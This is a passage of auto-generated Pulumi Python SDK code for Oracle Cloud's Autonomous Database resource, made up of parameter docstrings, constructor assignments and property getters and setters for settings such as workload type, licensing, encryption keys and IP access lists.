:param pulumi.Input[str] db_version: (Updatable) A valid Oracle Database version for Autonomous Database.`db_workload` AJD and APEX are only supported for `db_version` `19c` and above.
:param pulumi.Input[str] db_workload: (Updatable) The Autonomous Database workload type. The following values are valid:
* OLTP - indicates an Autonomous Transaction Processing database
* DW - indicates an Autonomous Data Warehouse database
* AJD - indicates an Autonomous JSON Database
* APEX - indicates an Autonomous Database with the Oracle APEX Application Development workload type. *Note: `db_workload` can only be updated from AJD to OLTP or from a free OLTP to AJD.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
:param pulumi.Input[str] display_name: (Updatable) The user-friendly name for the Autonomous Database. The name does not have to be unique.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
:param pulumi.Input[bool] is_access_control_enabled: (Updatable) Indicates if the database-level access control is enabled. If disabled, database access is defined by the network security rules. If enabled, database access is restricted to the IP addresses defined by the rules specified with the `whitelistedIps` property. While specifying `whitelistedIps` rules is optional, if database-level access control is enabled and no rules are specified, the database will become inaccessible. The rules can be added later using the `UpdateAutonomousDatabase` API operation or edit option in console. When creating a database clone, the desired access control setting should be specified. By default, database-level access control will be disabled for the clone.
:param pulumi.Input[bool] is_auto_scaling_enabled: (Updatable) Indicates if auto scaling is enabled for the Autonomous Database OCPU core count. The default value is `FALSE`.
:param pulumi.Input[bool] is_data_guard_enabled: (Updatable) Indicates whether the Autonomous Database has Data Guard enabled.
:param pulumi.Input[bool] is_dedicated: True if the database is on [dedicated Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adbddoverview.htm).
:param pulumi.Input[bool] is_free_tier: (Updatable) Indicates if this is an Always Free resource. The default value is false. Note that Always Free Autonomous Databases have 1 CPU and 20GB of memory. For Always Free databases, memory and CPU cannot be scaled. When `db_workload` is `AJD` or `APEX` it cannot be `true`.
:param pulumi.Input[bool] is_preview_version_with_service_terms_accepted: If set to `TRUE`, indicates that an Autonomous Database preview version is being provisioned, and that the preview version's terms of service have been accepted. Note that preview version software is only available for databases on [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI).
:param pulumi.Input[bool] is_refreshable_clone: (Updatable) True for creating a refreshable clone and False for detaching the clone from source Autonomous Database. Detaching is one time operation and clone becomes a regular Autonomous Database.
:param pulumi.Input[str] kms_key_id: The OCID of the key container that is used as the master encryption key in database transparent data encryption (TDE) operations.
:param pulumi.Input[str] license_model: (Updatable) The Oracle license model that applies to the Oracle Autonomous Database. Bring your own license (BYOL) allows you to apply your current on-premises Oracle software licenses to equivalent, highly automated Oracle PaaS and IaaS services in the cloud. License Included allows you to subscribe to new Oracle Database software licenses and the Database service. Note that when provisioning an Autonomous Database on [dedicated Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adbddoverview.htm), this attribute must be null because the attribute is already set at the Autonomous Exadata Infrastructure level. When using [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI), if a value is not specified, the system will supply the value of `BRING_YOUR_OWN_LICENSE`. It is a required field when `db_workload` is AJD and needs to be set to `LICENSE_INCLUDED` as AJD does not support default `license_model` value `BRING_YOUR_OWN_LICENSE`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] nsg_ids: (Updatable) A list of the [OCIDs](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the network security groups (NSGs) that this resource belongs to. Setting this to an empty array after the list is created removes the resource from all NSGs. For more information about NSGs, see [Security Rules](https://docs.cloud.oracle.com/iaas/Content/Network/Concepts/securityrules.htm). **NsgIds restrictions:**
* Autonomous Databases with private access require at least 1 Network Security Group (NSG). The nsgIds array cannot be empty.
:param pulumi.Input[float] ocpu_count: (Updatable) The number of OCPU cores to be made available to the database.
:param pulumi.Input[str] open_mode: The `DATABASE OPEN` mode. You can open the database in `READ_ONLY` or `READ_WRITE` mode.
:param pulumi.Input[str] operations_insights_status: Status of Operations Insights for this Autonomous Database.
:param pulumi.Input[str] permission_level: The Autonomous Database permission level. Restricted mode allows access only to admin users.
:param pulumi.Input[str] private_endpoint_label: (Updatable) The private endpoint label for the resource.
:param pulumi.Input[str] refreshable_mode: (Updatable) The refresh mode of the clone. AUTOMATIC indicates that the clone is automatically being refreshed with data from the source Autonomous Database.
:param pulumi.Input[bool] rotate_key_trigger: (Updatable) An optional property when flipped triggers rotation of KMS key. It is only applicable on dedicated databases i.e. where `is_dedicated` is true.
:param pulumi.Input[str] source: The source of the database: Use `NONE` for creating a new Autonomous Database. Use `DATABASE` for creating a new Autonomous Database by cloning an existing Autonomous Database.
:param pulumi.Input[str] source_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the source Autonomous Database that you will clone to create a new Autonomous Database.
:param pulumi.Input[Sequence[pulumi.Input[str]]] standby_whitelisted_ips: (Updatable) The client IP access control list (ACL). This feature is available for autonomous databases on [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI) and on Exadata Cloud@Customer. Only clients connecting from an IP address included in the ACL may access the Autonomous Database instance.
:param pulumi.Input[str] state: (Updatable) The current state of the Autonomous Database. Could be set to AVAILABLE or STOPPED
:param pulumi.Input[str] subnet_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the subnet the resource is associated with.
:param pulumi.Input[str] switchover_to: It is applicable only when `is_data_guard_enabled` is true. Could be set to `PRIMARY` or `STANDBY`. Default value is `PRIMARY`.
:param pulumi.Input[str] timestamp: The timestamp specified for the point-in-time clone of the source Autonomous Database. The timestamp must be in the past.
:param pulumi.Input[str] vault_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the Oracle Cloud Infrastructure [vault](https://docs.cloud.oracle.com/iaas/Content/KeyManagement/Concepts/keyoverview.htm#concepts).
:param pulumi.Input[Sequence[pulumi.Input[str]]] whitelisted_ips: (Updatable) The client IP access control list (ACL). This feature is available for autonomous databases on [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI) and on Exadata Cloud@Customer. Only clients connecting from an IP address included in the ACL may access the Autonomous Database instance.
"""
pulumi.set(__self__, "compartment_id", compartment_id)
pulumi.set(__self__, "db_name", db_name)
if admin_password is not None:
pulumi.set(__self__, "admin_password", admin_password)
if are_primary_whitelisted_ips_used is not None:
pulumi.set(__self__, "are_primary_whitelisted_ips_used", are_primary_whitelisted_ips_used)
if autonomous_container_database_id is not None:
pulumi.set(__self__, "autonomous_container_database_id", autonomous_container_database_id)
if autonomous_database_backup_id is not None:
pulumi.set(__self__, "autonomous_database_backup_id", autonomous_database_backup_id)
if autonomous_database_id is not None:
pulumi.set(__self__, "autonomous_database_id", autonomous_database_id)
if autonomous_maintenance_schedule_type is not None:
pulumi.set(__self__, "autonomous_maintenance_schedule_type", autonomous_maintenance_schedule_type)
if clone_type is not None:
pulumi.set(__self__, "clone_type", clone_type)
if cpu_core_count is not None:
pulumi.set(__self__, "cpu_core_count", cpu_core_count)
if customer_contacts is not None:
pulumi.set(__self__, "customer_contacts", customer_contacts)
if data_safe_status is not None:
pulumi.set(__self__, "data_safe_status", data_safe_status)
if data_storage_size_in_gb is not None:
pulumi.set(__self__, "data_storage_size_in_gb", data_storage_size_in_gb)
if data_storage_size_in_tbs is not None:
pulumi.set(__self__, "data_storage_size_in_tbs", data_storage_size_in_tbs)
if db_version is not None:
pulumi.set(__self__, "db_version", db_version)
if db_workload is not None:
pulumi.set(__self__, "db_workload", db_workload)
if defined_tags is not None:
pulumi.set(__self__, "defined_tags", defined_tags)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if freeform_tags is not None:
pulumi.set(__self__, "freeform_tags", freeform_tags)
if is_access_control_enabled is not None:
pulumi.set(__self__, "is_access_control_enabled", is_access_control_enabled)
if is_auto_scaling_enabled is not None:
pulumi.set(__self__, "is_auto_scaling_enabled", is_auto_scaling_enabled)
if is_data_guard_enabled is not None:
pulumi.set(__self__, "is_data_guard_enabled", is_data_guard_enabled)
if is_dedicated is not None:
pulumi.set(__self__, "is_dedicated", is_dedicated)
if is_free_tier is not None:
pulumi.set(__self__, "is_free_tier", is_free_tier)
if is_preview_version_with_service_terms_accepted is not None:
pulumi.set(__self__, "is_preview_version_with_service_terms_accepted", is_preview_version_with_service_terms_accepted)
if is_refreshable_clone is not None:
pulumi.set(__self__, "is_refreshable_clone", is_refreshable_clone)
if kms_key_id is not None:
pulumi.set(__self__, "kms_key_id", kms_key_id)
if license_model is not None:
pulumi.set(__self__, "license_model", license_model)
if nsg_ids is not None:
pulumi.set(__self__, "nsg_ids", nsg_ids)
if ocpu_count is not None:
pulumi.set(__self__, "ocpu_count", ocpu_count)
if open_mode is not None:
pulumi.set(__self__, "open_mode", open_mode)
if operations_insights_status is not None:
pulumi.set(__self__, "operations_insights_status", operations_insights_status)
if permission_level is not None:
pulumi.set(__self__, "permission_level", permission_level)
if private_endpoint_label is not None:
pulumi.set(__self__, "private_endpoint_label", private_endpoint_label)
if refreshable_mode is not None:
pulumi.set(__self__, "refreshable_mode", refreshable_mode)
if rotate_key_trigger is not None:
pulumi.set(__self__, "rotate_key_trigger", rotate_key_trigger)
if source is not None:
pulumi.set(__self__, "source", source)
if source_id is not None:
pulumi.set(__self__, "source_id", source_id)
if standby_whitelisted_ips is not None:
pulumi.set(__self__, "standby_whitelisted_ips", standby_whitelisted_ips)
if state is not None:
pulumi.set(__self__, "state", state)
if subnet_id is not None:
pulumi.set(__self__, "subnet_id", subnet_id)
if switchover_to is not None:
pulumi.set(__self__, "switchover_to", switchover_to)
if timestamp is not None:
pulumi.set(__self__, "timestamp", timestamp)
if vault_id is not None:
pulumi.set(__self__, "vault_id", vault_id)
if whitelisted_ips is not None:
pulumi.set(__self__, "whitelisted_ips", whitelisted_ips)
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> pulumi.Input[str]:
"""
(Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment of the Autonomous Database.
"""
return pulumi.get(self, "compartment_id")
@compartment_id.setter
def compartment_id(self, value: pulumi.Input[str]):
pulumi.set(self, "compartment_id", value)
@property
@pulumi.getter(name="dbName")
def db_name(self) -> pulumi.Input[str]:
"""
The database name. The name must begin with an alphabetic character and can contain a maximum of 14 alphanumeric characters. Special characters are not permitted. The database name must be unique in the tenancy.
"""
return pulumi.get(self, "db_name")
@db_name.setter
def db_name(self, value: pulumi.Input[str]):
pulumi.set(self, "db_name", value)
@property
@pulumi.getter(name="adminPassword")
def admin_password(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The password must be between 12 and 30 characters long, and must contain at least 1 uppercase, 1 lowercase, and 1 numeric character. It cannot contain the double quote symbol (") or the username "admin", regardless of casing. The password is mandatory if source value is "BACKUP_FROM_ID", "BACKUP_FROM_TIMESTAMP", "DATABASE" or "NONE".
"""
return pulumi.get(self, "admin_password")
@admin_password.setter
def admin_password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "admin_password", value)
@property
@pulumi.getter(name="arePrimaryWhitelistedIpsUsed")
def are_primary_whitelisted_ips_used(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) This field will be null if the Autonomous Database is not Data Guard enabled or Access Control is disabled. It's value would be `TRUE` if Autonomous Database is Data Guard enabled and Access Control is enabled and if the Autonomous Database uses primary IP access control list (ACL) for standby. It's value would be `FALSE` if Autonomous Database is Data Guard enabled and Access Control is enabled and if the Autonomous Database uses different IP access control list (ACL) for standby compared to primary.
"""
return pulumi.get(self, "are_primary_whitelisted_ips_used")
@are_primary_whitelisted_ips_used.setter
def are_primary_whitelisted_ips_used(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "are_primary_whitelisted_ips_used", value)
@property
@pulumi.getter(name="autonomousContainerDatabaseId")
def autonomous_container_database_id(self) -> Optional[pulumi.Input[str]]:
"""
The Autonomous Container Database [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm).
"""
return pulumi.get(self, "autonomous_container_database_id")
@autonomous_container_database_id.setter
def autonomous_container_database_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "autonomous_container_database_id", value)
@property
@pulumi.getter(name="autonomousDatabaseBackupId")
def autonomous_database_backup_id(self) -> Optional[pulumi.Input[str]]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the source Autonomous Database Backup that you will clone to create a new Autonomous Database.
"""
return pulumi.get(self, "autonomous_database_backup_id")
@autonomous_database_backup_id.setter
def autonomous_database_backup_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "autonomous_database_backup_id", value)
@property
@pulumi.getter(name="autonomousDatabaseId")
def autonomous_database_id(self) -> Optional[pulumi.Input[str]]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the source Autonomous Database that you will clone to create a new Autonomous Database.
"""
return pulumi.get(self, "autonomous_database_id")
@autonomous_database_id.setter
def autonomous_database_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "autonomous_database_id", value)
@property
@pulumi.getter(name="autonomousMaintenanceScheduleType")
def autonomous_maintenance_schedule_type(self) -> Optional[pulumi.Input[str]]:
"""
The maintenance schedule type of the Autonomous Database on shared Exadata infrastructure. The EARLY maintenance schedule of this Autonomous Database follows a schedule that applies patches prior to the REGULAR schedule.The REGULAR maintenance schedule of this Autonomous Database follows the normal cycle.
"""
return pulumi.get(self, "autonomous_maintenance_schedule_type")
@autonomous_maintenance_schedule_type.setter
def autonomous_maintenance_schedule_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "autonomous_maintenance_schedule_type", value)
@property
@pulumi.getter(name="cloneType")
def clone_type(self) -> Optional[pulumi.Input[str]]:
"""
The Autonomous Database clone type.
"""
return pulumi.get(self, "clone_type")
@clone_type.setter
def clone_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "clone_type", value)
@property
@pulumi.getter(name="cpuCoreCount")
def cpu_core_count(self) -> Optional[pulumi.Input[int]]:
"""
(Updatable) The number of OCPU cores to be made available to the database. For Autonomous Databases on dedicated Exadata infrastructure, the maximum number of cores is determined by the infrastructure shape. See [Characteristics of Infrastructure Shapes](https://www.oracle.com/pls/topic/lookup?ctx=en/cloud/paas/autonomous-database&id=ATPFG-GUID-B0F033C1-CC5A-42F0-B2E7-3CECFEDA1FD1) for shape details.
"""
return pulumi.get(self, "cpu_core_count")
@cpu_core_count.setter
def cpu_core_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "cpu_core_count", value)
@property
@pulumi.getter(name="customerContacts")
def customer_contacts(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['AutonomousDatabaseCustomerContactArgs']]]]:
"""
(Updatable) Customer Contacts.
"""
return pulumi.get(self, "customer_contacts")
@customer_contacts.setter
def customer_contacts(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['AutonomousDatabaseCustomerContactArgs']]]]):
pulumi.set(self, "customer_contacts", value)
@property
@pulumi.getter(name="dataSafeStatus")
def data_safe_status(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Status of the Data Safe registration for this Autonomous Database. Could be REGISTERED or NOT_REGISTERED.
"""
return pulumi.get(self, "data_safe_status")
@data_safe_status.setter
def data_safe_status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "data_safe_status", value)
@property
@pulumi.getter(name="dataStorageSizeInGb")
def data_storage_size_in_gb(self) -> Optional[pulumi.Input[int]]:
"""
(Updatable) The size, in gigabytes, of the data volume that will be created and attached to the database. This storage can later be scaled up if needed. The maximum storage value is determined by the infrastructure shape. See [Characteristics of Infrastructure Shapes](https://www.oracle.com/pls/topic/lookup?ctx=en/cloud/paas/autonomous-database&id=ATPFG-GUID-B0F033C1-CC5A-42F0-B2E7-3CECFEDA1FD1) for shape details.
"""
return pulumi.get(self, "data_storage_size_in_gb")
@data_storage_size_in_gb.setter
def data_storage_size_in_gb(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "data_storage_size_in_gb", value)
@property
@pulumi.getter(name="dataStorageSizeInTbs")
def data_storage_size_in_tbs(self) -> Optional[pulumi.Input[int]]:
"""
(Updatable) The size, in terabytes, of the data volume that will be created and attached to the database. This storage can later be scaled up if needed. For Autonomous Databases on dedicated Exadata infrastructure, the maximum storage value is determined by the infrastructure shape. See [Characteristics of Infrastructure Shapes](https://www.oracle.com/pls/topic/lookup?ctx=en/cloud/paas/autonomous-database&id=ATPFG-GUID-B0F033C1-CC5A-42F0-B2E7-3CECFEDA1FD1) for shape details.
"""
return pulumi.get(self, "data_storage_size_in_tbs")
@data_storage_size_in_tbs.setter
def data_storage_size_in_tbs(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "data_storage_size_in_tbs", value)
@property
@pulumi.getter(name="dbVersion")
def db_version(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) A valid Oracle Database version for Autonomous Database.`db_workload` AJD and APEX are only supported for `db_version` `19c` and above.
"""
return pulumi.get(self, "db_version")
@db_version.setter
def db_version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "db_version", value)
@property
@pulumi.getter(name="dbWorkload")
def db_workload(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The Autonomous Database workload type. The following values are valid:
* OLTP - indicates an Autonomous Transaction Processing database
* DW - indicates an Autonomous Data Warehouse database
* AJD - indicates an Autonomous JSON Database
* APEX - indicates an Autonomous Database with the Oracle APEX Application Development workload type. *Note: `db_workload` can only be updated from AJD to OLTP or from a free OLTP to AJD.
"""
return pulumi.get(self, "db_workload")
@db_workload.setter
def db_workload(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "db_workload", value)
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
"""
return pulumi.get(self, "defined_tags")
@defined_tags.setter
def defined_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "defined_tags", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The user-friendly name for the Autonomous Database. The name does not have to be unique.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
"""
return pulumi.get(self, "freeform_tags")
@freeform_tags.setter
def freeform_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "freeform_tags", value)
@property
@pulumi.getter(name="isAccessControlEnabled")
def is_access_control_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) Indicates if the database-level access control is enabled. If disabled, database access is defined by the network security rules. If enabled, database access is restricted to the IP addresses defined by the rules specified with the `whitelistedIps` property. While specifying `whitelistedIps` rules is optional, if database-level access control is enabled and no rules are specified, the database will become inaccessible. The rules can be added later using the `UpdateAutonomousDatabase` API operation or edit option in console. When creating a database clone, the desired access control setting should be specified. By default, database-level access control will be disabled for the clone.
"""
return pulumi.get(self, "is_access_control_enabled")
@is_access_control_enabled.setter
def is_access_control_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_access_control_enabled", value)
@property
@pulumi.getter(name="isAutoScalingEnabled")
def is_auto_scaling_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) Indicates if auto scaling is enabled for the Autonomous Database OCPU core count. The default value is `FALSE`.
"""
return pulumi.get(self, "is_auto_scaling_enabled")
@is_auto_scaling_enabled.setter
def is_auto_scaling_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_auto_scaling_enabled", value)
@property
@pulumi.getter(name="isDataGuardEnabled")
def is_data_guard_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) Indicates whether the Autonomous Database has Data Guard enabled.
"""
return pulumi.get(self, "is_data_guard_enabled")
@is_data_guard_enabled.setter
def is_data_guard_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_data_guard_enabled", value)
@property
@pulumi.getter(name="isDedicated")
def is_dedicated(self) -> Optional[pulumi.Input[bool]]:
"""
True if the database is on [dedicated Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adbddoverview.htm).
"""
return pulumi.get(self, "is_dedicated")
@is_dedicated.setter
def is_dedicated(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_dedicated", value)
@property
@pulumi.getter(name="isFreeTier")
def is_free_tier(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) Indicates if this is an Always Free resource. The default value is false. Note that Always Free Autonomous Databases have 1 CPU and 20GB of memory. For Always Free databases, memory and CPU cannot be scaled. When `db_workload` is `AJD` or `APEX` it cannot be `true`.
"""
return pulumi.get(self, "is_free_tier")
@is_free_tier.setter
def is_free_tier(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_free_tier", value)
@property
@pulumi.getter(name="isPreviewVersionWithServiceTermsAccepted")
def is_preview_version_with_service_terms_accepted(self) -> Optional[pulumi.Input[bool]]:
"""
If set to `TRUE`, indicates that an Autonomous Database preview version is being provisioned, and that the preview version's terms of service have been accepted. Note that preview version software is only available for databases on [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI).
"""
return pulumi.get(self, "is_preview_version_with_service_terms_accepted")
@is_preview_version_with_service_terms_accepted.setter
def is_preview_version_with_service_terms_accepted(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_preview_version_with_service_terms_accepted", value)
@property
@pulumi.getter(name="isRefreshableClone")
def is_refreshable_clone(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) True for creating a refreshable clone and False for detaching the clone from source Autonomous Database. Detaching is one time operation and clone becomes a regular Autonomous Database.
"""
return pulumi.get(self, "is_refreshable_clone")
@is_refreshable_clone.setter
def is_refreshable_clone(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_refreshable_clone", value)
@property
@pulumi.getter(name="kmsKeyId")
def kms_key_id(self) -> Optional[pulumi.Input[str]]:
"""
The OCID of the key container that is used as the master encryption key in database transparent data encryption (TDE) operations.
"""
return pulumi.get(self, "kms_key_id")
@kms_key_id.setter
def kms_key_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "kms_key_id", value)
@property
@pulumi.getter(name="licenseModel")
def license_model(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The Oracle license model that applies to the Oracle Autonomous Database. Bring your own license (BYOL) allows you to apply your current on-premises Oracle software licenses to equivalent, highly automated Oracle PaaS and IaaS services in the cloud. License Included allows you to subscribe to new Oracle Database software licenses and the Database service. Note that when provisioning an Autonomous Database on [dedicated Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adbddoverview.htm), this attribute must be null because the attribute is already set at the Autonomous Exadata Infrastructure level. When using [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI), if a value is not specified, the system will supply the value of `BRING_YOUR_OWN_LICENSE`. It is a required field when `db_workload` is AJD and needs to be set to `LICENSE_INCLUDED` as AJD does not support default `license_model` value `BRING_YOUR_OWN_LICENSE`.
"""
return pulumi.get(self, "license_model")
@license_model.setter
def license_model(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "license_model", value)
@property
@pulumi.getter(name="nsgIds")
def nsg_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
(Updatable) A list of the [OCIDs](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the network security groups (NSGs) that this resource belongs to. Setting this to an empty array after the list is created removes the resource from all NSGs. For more information about NSGs, see [Security Rules](https://docs.cloud.oracle.com/iaas/Content/Network/Concepts/securityrules.htm). **NsgIds restrictions:**
* Autonomous Databases with private access require at least 1 Network Security Group (NSG). The nsgIds array cannot be empty.
"""
return pulumi.get(self, "nsg_ids")
@nsg_ids.setter
def nsg_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "nsg_ids", value)
@property
@pulumi.getter(name="ocpuCount")
def ocpu_count(self) -> Optional[pulumi.Input[float]]:
"""
(Updatable) The number of OCPU cores to be made available to the database.
"""
return pulumi.get(self, "ocpu_count")
@ocpu_count.setter
def ocpu_count(self, value: Optional[pulumi.Input[float]]):
pulumi.set(self, "ocpu_count", value)
@property
@pulumi.getter(name="openMode")
def open_mode(self) -> Optional[pulumi.Input[str]]:
"""
The `DATABASE OPEN` mode. You can open the database in `READ_ONLY` or `READ_WRITE` mode.
"""
return pulumi.get(self, "open_mode")
@open_mode.setter
def open_mode(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "open_mode", value)
@property
@pulumi.getter(name="operationsInsightsStatus")
def operations_insights_status(self) -> Optional[pulumi.Input[str]]:
"""
Status of Operations Insights for this Autonomous Database.
"""
return pulumi.get(self, "operations_insights_status")
@operations_insights_status.setter
def operations_insights_status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "operations_insights_status", value)
@property
@pulumi.getter(name="permissionLevel")
def permission_level(self) -> Optional[pulumi.Input[str]]:
"""
The Autonomous Database permission level. Restricted mode allows access only to admin users.
"""
return pulumi.get(self, "permission_level")
@permission_level.setter
def permission_level(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "permission_level", value)
@property
@pulumi.getter(name="privateEndpointLabel")
def private_endpoint_label(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The private endpoint label for the resource.
"""
return pulumi.get(self, "private_endpoint_label")
@private_endpoint_label.setter
def private_endpoint_label(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_endpoint_label", value)
@property
@pulumi.getter(name="refreshableMode")
def refreshable_mode(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The refresh mode of the clone. AUTOMATIC indicates that the clone is automatically being refreshed with data from the source Autonomous Database.
"""
return pulumi.get(self, "refreshable_mode")
@refreshable_mode.setter
def refreshable_mode(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "refreshable_mode", value)
@property
@pulumi.getter(name="rotateKeyTrigger")
def rotate_key_trigger(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) An optional property when flipped triggers rotation of KMS key. It is only applicable on dedicated databases i.e. where `is_dedicated` is true.
"""
return pulumi.get(self, "rotate_key_trigger")
@rotate_key_trigger.setter
def rotate_key_trigger(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "rotate_key_trigger", value)
@property
@pulumi.getter
def source(self) -> Optional[pulumi.Input[str]]:
"""
The source of the database: Use `NONE` for creating a new Autonomous Database. Use `DATABASE` for creating a new Autonomous Database by cloning an existing Autonomous Database.
"""
return pulumi.get(self, "source")
@source.setter
def source(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source", value)
@property
@pulumi.getter(name="sourceId")
def source_id(self) -> Optional[pulumi.Input[str]]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the source Autonomous Database that you will clone to create a new Autonomous Database.
"""
return pulumi.get(self, "source_id")
@source_id.setter
def source_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source_id", value)
@property
@pulumi.getter(name="standbyWhitelistedIps")
def standby_whitelisted_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
(Updatable) The client IP access control list (ACL). This feature is available for autonomous databases on [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI) and on Exadata Cloud@Customer. Only clients connecting from an IP address included in the ACL may access the Autonomous Database instance.
"""
return pulumi.get(self, "standby_whitelisted_ips")
@standby_whitelisted_ips.setter
def standby_whitelisted_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "standby_whitelisted_ips", value)
@property
@pulumi.getter
def state(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The current state of the Autonomous Database. Could be set to AVAILABLE or STOPPED
"""
return pulumi.get(self, "state")
@state.setter
def state(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "state", value)
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the subnet the resource is associated with.
"""
return pulumi.get(self, "subnet_id")
@subnet_id.setter
def subnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet_id", value)
@property
@pulumi.getter(name="switchoverTo")
def switchover_to(self) -> Optional[pulumi.Input[str]]:
"""
